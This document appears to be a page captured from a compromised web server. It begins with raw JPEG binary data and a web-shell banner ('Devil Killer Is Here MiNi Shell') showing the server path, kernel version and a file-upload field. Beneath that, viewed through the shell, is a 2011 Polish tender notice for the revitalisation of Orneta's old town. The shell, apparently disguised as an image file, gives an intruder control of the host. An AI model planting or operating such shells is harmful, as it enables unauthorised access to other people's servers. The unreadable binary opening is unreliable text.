JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110228/31542-N-2011.html

<p class="kh_header"><b>Orneta: Realizacja Projektu : Ornecka Starówka- Zintegrowany projekt rewitalizacji społeczno - urbanistycznej historycznego  Centrum Ornety</b><br>
<b>Numer ogłoszenia: 31542 - 2011; data zamieszczenia: 28.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja Projektu : Ornecka Starówka- Zintegrowany projekt rewitalizacji społeczno - urbanistycznej historycznego  Centrum Ornety.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja Projektu : Ornecka Starówka- Zintegrowany projekt rewitalizacji społeczno - urbanistycznej historycznego   
Centrum Ornety. 
Przedmiot zamówienia został podzielony na trzy części 
Część 1: Renowacja zabytkowych kamienic w centrum Starego Miasta  w Ornecie przy  ulicy Pionierów 10, 12, 14, 16.
Część 2: Renowacja zabytkowych kamienic w centrum Starego Miasta w Ornecie przy  uicy Kościuszki 8, Pionierów 15, 5.
Część 3: Zagospodarowanie i uporządkowanie zdegradowanych i pustych przestrzeni  na obszarze Starego Miasta przy ulicy Plac Wolności 37; Żelaznej dz. nr. nr 167/14; 170;  Żelaznej dz. nr. 171/9; 172; 171/8 w Ornecie
2.Zakres rzeczowy  dla Części 1, 2 i 3  przedmiotu zamówienia został przedstawiony w załączniku I do ogłoszenia.   
3.Szczegółowy  opis przedmiotu zamówienia dla Części 1, 2 i 3 zamówienia przedstawiony został w Rozdziale III niniejszej SIWZ .
4.Szczegółowy zakres rzeczowy przedmiotu zamówienia  dla Części 1, 2 i 3 przedmiotu zamówienia  opisuje dokumentacja projektowa   (Rozdział VIII SIWZ), przedmiary robót   (Rozdział VI  SIWZ), specyfikacje techniczna wykonania i  odbioru robót budowlanych (Rozdział  VII SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6  ustawy Pzp .  Wielkość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.30.00.00-0, 45.26.00.00-7, 45.23.31.40-2, 45.23.32.00-1, 45.11.00.00-1, 45.23.24.11-6, 45.34.20.00-6, 45.31.61.00-6, 77.31.00.00-6, 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium
1.Wysokość wadium.
1) dla Części 1 przedmiotu zamówienia 10 000 zł (słownie: dziesięć tysięcy złotych)
2) dla Części 2 przedmiotu zamówienia 10 000 zł (słownie: dziesięć tysięcy złotych)
3) dla Części 3 przedmiot zamówienia 10 000 zł (słownie: dziesięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1, 2 i 3 przedmiotu zamówienia Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert , a  jeżeli okres prowadzenia działalności jest  krótszy  w  tym okresie wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo zakończył co najmniej :
a) dla Części 1 przedmiotu zamówienia
-2 roboty budowlane ( w ramach dwóch podpisanych umów) polegające na przebudowie, rozbudowie lub  remoncie budynków objętych ochroną konserwatora zabytków (na prowadzenie robót budowlanych przy zabytku było wymagane zezwolenie konserwatora zabytków) spełniające łącznie następujące warunki : 
-łączna powierzchnia użytkowa budynków na których prowadzone były 2  roboty 
budowlane nie mniejsza niż  800 m2    
-i łączna wartość brutto 2 robót budowlanych nie mniejsza  niż 1 200 000 zł  
-i łączny zakres rzeczowy wykonanych 2 robót budowlanych bez względu na 
rodzaj użytego materiału obejmował co najmniej: wykonanie nowego lub wymianę   
istniejącego pokrycia dachowego; remont lub/i renowację elewacji frontowej; 
wymianę lub/i renowację stolarki otworowej ( okiennej i  drzwiowej). 
b)dla Części 2 przedmiotu zamówienia
-2 roboty budowlane ( w ramach dwóch podpisanych umów) polegające na przebudowie, rozbudowie lub  remoncie budynków objętych ochroną konserwatora zabytków (na prowadzenie robót budowlanych przy zabytku było wymagane zezwolenie konserwatora zabytków) spełniające łącznie następujące warunki : 
-łączna powierzchnia użytkowa budynków na których prowadzone były 2  roboty 
budowlane nie mniejsza niż  500 m2    
-i łączna wartość brutto 2 robót budowlanych nie mniejsza  niż 800 000 zł  
-i łączny zakres rzeczowy wykonanych 2 robót budowlanych bez względu na 
rodzaj użytego materiału obejmował co najmniej: wykonanie nowego lub wymianę   
istniejącego pokrycia dachowego; remont lub/i renowację elewacji frontowej; 
wymianę lub/i renowację stolarki otworowej ( okiennej i  drzwiowej). 
c) dla Części 3 przedmiotu zamówienia 
-robotę lub roboty budowlane polegające  na budowie  przebudowie lub  remoncie  
nawierzchni dróg, placów, chodników lub zagospodarowaniu terenu spełniające łącznie następujące warunki : 
-łączna wartość brutto roboty lub  robót budowlanych nie mniejsza  niż 1 000 000 zł  
-i  łączny zakres rzeczowy wykonanej/ych roboty/robót  budowlanych obejmował co najmniej: wykonanie nawierzchni z kostki kamiennej  na łącznej powierzchni  minimum 700 m2; wykonanie nawierzchni z kostki betonowej  na łącznej powierzchni minimum 1500 m2
Ocena spełnienia warunku dla Części 1, 2 i 3 przedmiotu zamówienia nastąpi  na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w  § 6 ust. 1 pkt 2 IDW</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1, 2 i 3 przedmiotu zamówienia Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą       
uczestniczyć w wykonywaniu zamówienia, tj. co najmniej

a) dla Części 1 przedmiotu zamówienia
-  1 kierownik budowy posiadający uprawnienia  budowlane do kierowania robotami 
budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub  
odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,  posiadający min 2 lata doświadczenia jako kierownik budowy lub robót oraz posiadający minimum dwuletnią  udokumentowaną praktykę zawodową na budowie przy zabytkach nieruchomych zgodnie z & 8 Rozporządzenia Ministra Kultury z dnia 09.06.2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków  oraz badań archeologicznych i poszukiwań ukrytych  lub porzuconych zabytków ruchomych (Dz.U. z 2004r., nr 150, poz. 
1579)
-  1 kierownik robót elektrycznych posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadający min 2 lata  doświadczenia jako kierownik budowy lub robót
- 1 osoba posiadająca odpowiednie uprawnienia zgodnie z &7. Rozporządzenia Ministra Kultury z dnia 09.06.2004r. w sprawie prowadzenia prac konserwatorskich, 
restauratorskich,  robót budowlanych, badań konserwatorskich i achitektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych  lub porzuconych zabytków ruchomych (Dz.U. z 2004r., nr 150, poz. 1579) do prowadzenia prac konserwatorskich przy elewacji frontowej, zabytkowej stolarce, i ceglanych stropach piwnic  
-  1 osoba posiadająca odpowiednie uprawnienia zgodnie z & 9 i 10 Rozporządzenia 
Ministra Kultury z dnia 09.06.2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych  lub porzuconych zabytków ruchomych (Dz.U. z 2004r., nr 150, poz. 1579) do prowadzenia prac i nadzoru archeologicznego przy robotach ziemnych  

b) dla Części 2 przedmiotu zamówienia
-  1 kierownik budowy posiadający uprawnienia  budowlane do kierowania robotami 
budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub  
odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,  posiadający min 2 lata doświadczenia jako kierownik budowy lub robót oraz posiadający minimum dwuletnią  udokumentowaną praktykę zawodową na budowie przy zabytkach nieruchomych zgodnie z & 8 Rozporządzenia Ministra Kultury z dnia 09.06.2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków  oraz badań archeologicznych i poszukiwań ukrytych  lub porzuconych zabytków ruchomych (Dz.U. z 2004r., nr 150, poz. 
1579)
-  1 kierownik robót elektrycznych posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadający min 2 lata  doświadczenia jako kierownik budowy lub robót
- 1 osoba posiadająca odpowiednie uprawnienia zgodnie z &7. Rozporządzenia Ministra Kultury z dnia 09.06.2004r. w sprawie prowadzenia prac konserwatorskich, 
restauratorskich,  robót budowlanych, badań konserwatorskich i achitektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych  lub porzuconych zabytków ruchomych (Dz.U. z 2004r., nr 150, poz. 1579) do prowadzenia prac konserwatorskich przy elewacji frontowej, zabytkowej stolarce, i ceglanych stropach piwnic  
-  1 osoba posiadająca odpowiednie uprawnienia zgodnie z & 9 i 10 Rozporządzenia 
Ministra Kultury z dnia 09.06.2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych  lub porzuconych zabytków ruchomych (Dz.U. z 2004r., nr 150, poz. 1579) do prowadzenia prac i nadzoru archeologicznego przy robotach ziemnych  

c) dla Części 3 przedmiotu zamówienia
-  1 kierownik budowy posiadający uprawnienia  budowlane do kierowania robotami 
budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub drogowej lub  odpowiadające  im ważne uprawnienia budowlane, które zostały 
wydane na podstawie  wcześniej obowiązujących przepisów, posiadający min  2 lata doświadczenia jako kierownik budowy lub robót, oraz posiadający  minimum dwuletnią udokumentowaną praktykę zawodową na budowie przy zabytkach nieruchomych  zgodnie z & 8 Rozporządzenia Ministra Kultury z dnia 09.06.2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym  do rejestru zabytków  oraz badań archeologicznych i poszukiwań ukrytych  lub porzuconych zabytków ruchomych (Dz.U.  z 2004r., nr 150, poz. 1579)
-  1 kierownik robót budowlanych posiadający uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów , posiadający min 2 lata  doświadczenia jako kierownik budowy lub robót
-  1 kierownik robót drogowych posiadający uprawnienia  budowlane do kierowania 
robotami budowlanymi w specjalności drogowej  lub  odpowiadające im ważne 
uprawnienia budowlane, które zostały wydane na podstawie  wcześniej 
obowiązujących przepisów , posiadający min 2 lata  doświadczenia jako kierownik 
budowy lub robót
-  1 kierownik robót sanitarnych posiadający uprawnienia budowlane w specjalności 
instalacyjnej w  zakresie sieci wodociągowych i kanalizacyjnych, posiadający min 2 lata  doświadczenia jako kierownik budowy lub robót
- 1 kierownik robót elektrycznych posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci i urządzeń elektrycznych i elektroenergetycznych, posiadający min 2 lata  doświadczenia jako kierownik budowy lub robót
-  1 osoba posiadająca odpowiednie uprawnienia zgodnie z & 9 i 10 Rozporządzenia Ministra Kultury z dnia 09.06.2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych  lub porzuconych zabytków ruchomych (Dz.U. z 2004r., nr 150, poz. 1579) do prowadzenia prac i nadzoru archeologicznego przy robotach ziemnych. 
Zamawiający dopuszcza łączenie funkcji przez wskazane osoby, które będą wykonywać niniejsze  zamówienie pod warunkiem, iż osoba ta spełnia łącznie wymagania dla każdej z łączonej funkcji.
Ocena spełnienia warunku nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w  § 6 ust. 1 pkt 3 i 4  IDW</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1, 2 i 3 przedmiotu zamówienia Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2.Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
1) Konieczność przedłużenia terminu umownego zakończenia przedmiotu zamówienia z uwagi na: 
a)wystąpienie w trakcie realizacji umowy robót dodatkowych zgodnie z art. 67 ust.1 pkt 5 ustawy Pzp lub zamiennych opóźniających lub wstrzymujących realizację zamówienia podstawowego objętego umową , mających wpływ na uzgodniony termin zakończenia jego realizacji 
b)konieczność wprowadzenia zmian w dokumentacji projektowej w trakcie realizacji 
przedmiotu umowy z przyczyn niezależnych od  wykonawcy 
c)wstrzymanie przez właściwe organy robót objętych umową  z przyczyn niezależnych od  wykonawcy, 
d)działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności utrudniającej wykonanie prac, w tym przeprowadzenie prób i sprawdzeń, dokonanie odbioru. 
e)niekorzystne warunki atmosferyczne ( długotrwałe opady , przeszkody atmosferyczne o charakterze katastrof) utrudniające wykonanie prac, w tym przeprowadzenie prób i sprawdzeń, dokonanie odbioru, 
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie 
realizacji robót,   który przy składaniu ofert  musi być normalnie brany pod uwagę 
f) nie przekazanie placu budowy w terminie do 14 dni od daty podpisania umowy,
g) wstrzymania realizacji umowy z powodu braku płatności ustalonego wynagrodzenia, jeżeli  zwłoka  w zapłacie należnego wynagrodzenia trwa dłużej niż 30 dni od  ustalonej daty  zapłaty wyszczególnionej w fakturze, 
h)zmiany prawa o charakterze bezwzględnie obowiązującym  - powodująca 
konieczność  wydłużenia procesu budowlanego (dodatkowe czynności prawne i  
faktyczne nakazane    prawem nie występujące w dacie zawarcia umowy, chyba, że w/w zmiany prawa winny być   znane stronom w sytuacji odłożonego ich wejścia w życie - vacatio legis, o okres opóźniający lub wstrzymujący realizację zamówienia potwierdzony przez Inżyniera Kontraktu  w dzienniku budowy    
2) Zmianę wynagrodzenia wykonawcy w przypadku:
a)zmiany ilościowego zakresu rzeczowego przedmiotu zamówienia tj  zmniejszenia lub zwiększenia  ilościowego zakresu rzeczowego przedmiotu zamówienia,
b)wystąpienia robót zamiennych (zamiennych rozwiązań technologicznych, zamiennych materiałów i urządzeń) .
c)zmiany stawki podatku VAT 
3)Zmianę ilościowego zakresu rzeczowego przedmiotu umowy
4)Zmianę osób  odpowiedzialnych za kierowanie robotami budowlanymi ze strony wykonawcy (kierownika budowy, kierowników robót) oraz za nadzór inwestorski ze strony zamawiającego (inspektora nadzoru inwestorskiego) 
5)  Zmianę warunków płatności w przypadku posiadania przez Zamawiającego środków finansowych tj.
a)% wynagrodzenia płatnego na podstawie faktur przejściowych może zostać podwyższony przez Zamawiającego  max do 90 %
b)% wynagrodzenia po odbiorze częściowy/końcowym może zostać obniżony przez  Zamawiającego do  10 %
c)zmiana terminów ( dotyczy roku)  wystawiania faktur
